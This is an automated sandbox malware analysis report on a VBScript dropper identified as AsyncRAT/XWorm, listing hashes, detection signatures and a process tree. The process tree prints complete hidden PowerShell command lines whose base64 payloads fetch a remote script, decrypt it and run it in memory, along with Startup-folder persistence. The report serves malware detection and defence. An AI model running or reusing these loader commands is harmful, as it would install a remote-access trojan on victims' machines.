Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Xclient.vbs

Overview

General Information

Sample name:Xclient.vbs
Analysis ID:1615978
MD5:37c408a159618ed1ceb1dd3bc6ec4d5f
SHA1:a9e709795198f402248ae5f5ec92e761955ad4e9
SHA256:07b844c4d1fa8600a4cd089adab45c9718629cf4258eb86acbaecba77cb5a0be
Tags:vbsuser-d1v35h
Infos:

Detection

AsyncRAT, XWorm
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected AsyncRAT
Yara detected XWorm
.NET source code contains a sample name check
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to capture screen (.Net source)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses shutdown.exe to shutdown or reboot the system
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Spawns drivers
Stores files to the Windows start menu directory
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7292 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Xclient.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 7348 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\bYKR19crJ6p8904.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7400 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\bYKR19crJ6p8904.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7456 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkcGd2d2wpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRyZmcgaW4gJGNtdGt0KSB7CWlmICgkcmZnLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSR3bHFpcD0kcmZnLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRla2Nmbj1bc3RyaW5nW11dJHdscWlwLlNwbGl0KCdcJyk7SUVYICckanhpY3M9aWxneWUgKGtkYXV0IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGVrY2ZuWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJHVncXJqPWlsZ3llIChrZGF1dCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRla2NmblsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt6Z3d3dyAkanhpY3MgJG51bGw7emd3d3cgJHVncXJqICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • shutdown.exe (PID: 3452 cmdline: shutdown.exe -L MD5: F2A4E18DA72BB2C5B21076A5DE382A20)
  • cmd.exe (PID: 7800 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6dd171fd.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7852 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6dd171fd.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7900 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkcGd2d2wpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRyZmcgaW4gJGNtdGt0KSB7CWlmICgkcmZnLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSR3bHFpcD0kcmZnLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRla2Nmbj1bc3RyaW5nW11dJHdscWlwLlNwbGl0KCdcJyk7SUVYICckanhpY3M9aWxneWUgKGtkYXV0IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGVrY2ZuWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJHVncXJqPWlsZ3llIChrZGF1dCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRla2NmblsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt6Z3d3dyAkanhpY3MgJG51bGw7emd3d3cgJHVncXJqICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cmd.exe (PID: 8156 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_0c891e71.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2852 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_0c891e71.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3152 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkcGd2d2wpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRyZmcgaW4gJGNtdGt0KSB7CWlmICgkcmZnLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSR3bHFpcD0kcmZnLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRla2Nmbj1bc3RyaW5nW11dJHdscWlwLlNwbGl0KCdcJyk7SUVYICckanhpY3M9aWxneWUgKGtkYXV0IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGVrY2ZuWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJHVncXJqPWlsZ3llIChrZGF1dCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRla2NmblsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt6Z3d3dyAkanhpY3MgJG51bGw7emd3d3cgJHVncXJqICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cmd.exe (PID: 5936 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a276d6c0.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7360 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a276d6c0.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7312 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU